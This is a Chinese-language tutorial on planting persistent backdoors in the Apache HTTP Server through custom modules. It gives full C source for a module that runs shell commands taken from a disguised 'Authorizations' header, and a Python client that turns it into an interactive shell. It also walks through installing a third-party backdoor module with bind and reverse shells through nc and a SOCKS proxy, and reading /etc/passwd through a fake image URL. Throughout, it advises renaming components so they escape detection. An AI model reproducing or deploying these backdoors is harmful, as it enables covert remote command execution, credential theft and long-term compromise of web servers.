Apache Module后门1¶

From:https://github.com/WangYihang/Apache-HTTP-Server-Module-Backdoor
生成模板结构
>apxs -g -n auth

编辑mod_auth.c文件

```c

include "httpd.h"¶

include "http_config.h"¶

include "http_protocol.h"¶

include "ap_config.h"¶

include ¶

static int auth_handler(request_rec r) { const apr_array_header_t *fields; int i; apr_table_entry_t *e = 0; char FLAG = 0; fields = apr_table_elts(r->headers_in); e = (apr_table_entry_t *) fields->elts; for(i = 0; i < fields->nelts; i++) { if(strcmp(e[i].key, "Authorizations") == 0){ FLAG = 1; break; } } if (FLAG){ char * command = e[i].val; FILE fp = popen(command,"r"); char buffer[0x100] = {0}; int counter = 1; while(counter){ counter = fread(buffer, 1, sizeof(buffer), fp); ap_rwrite(buffer, counter, r); } pclose(fp); return DONE; } return DECLINED; } static void auth_register_hooks(apr_pool_t p) { ap_hook_handler(auth_handler, NULL, NULL, APR_HOOK_MIDDLE); } module AP_MODULE_DECLARE_DATA auth_module = { STANDARD20_MODULE_STUFF, NULL, / create per-dir config structures / NULL, / merge per-dir config structures / NULL, / create per-server config structures / NULL, / merge per-server config structures / NULL, / table of config file commands / auth_register_hooks / register hooks */ }; ``` 编译后重启apache >apxs -i -a -c mod_auth.c && service apache2 restart

原文件接受的头是backdoor太明显，这里换成了Authorizations

或使用python来执行

```python

!/usr/bin/env python¶

-- coding: utf-8 --¶

import requests import sys def exploit(host, port, command): headers = { "Authorizations": command } url = "http://%s:%d/" % (host, port) response = requests.get(url, headers=headers) content = response.content print content def main(): if len(sys.argv) != 3: print "Usage : " print "\tpython %s [HOST] [PORT]" % (sys.argv[0]) exit(1) host = sys.argv[1] port = int(sys.argv[2]) while True: command = raw_input("$ ") if command == "exit": break exploit(host, port, command) if name == "main": main() ```

Apache Module后门2¶

From:https://github.com/VladRico/apache2_BackdoorMod
.load文件传入/etc/apache2/mods-available/目录，.so文件传入/usr/lib/apache2/modules/目录
启动后门模块，重启apache
>a2enmod backdoor&service apache2 restart

Cookie里添加字段password=backdoor
访问http://ip/ping返回如下图说明后门正常允许

访问http://ip/bind/12345 开启正向连接，攻击机执行nc ip 12345即可

访问http://ip/revtty/192.168.0.107/12138 开启反向连接，攻击机109执行nc监听12138即可

访问http://ip/proxy/1337开启socks代理

想要结束socks代理可执行
>echo "imdonewithyou" |nc 192.168.0.111 1337

即可结束socks代理
以上原作者的文件命名backdoor太明显，可以自己修改文件重新编译
创建模板结构命名为phpmodev

修改cookie内容为迷惑字段Authorizations=PHPSESSIONID

Apache Module后门3¶

From: https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247491179&idx=1&sn=ab26fe36ac74f5b140e91279ae8018c7
生成模板结构
>apxs -g -n phpdevmod

编辑mod_phpdevmod.c文件
编译
>make -e CC=x86_64-linux-gnu-g++

生成的.so文件在/.libs目录下

将其复制到/usr/lib/apache2/modules/目录
修改/etc/apache2/mods-enabled/php7.0.load文件，添加如下
LoadModule phpdevmod_module /usr/lib/apache2/modules/mod_phpdevmod.so
<Location /qq.jpg>    #可以设置为任何不存在的文件
    setHandler phpdevmod
</Location>

需重启apache服务
访问后门方式http://ip/qq.jpg?命令的url编码
直接访问后门文件

636174202F6574632F706173737764为cat /etc/passwd的url编码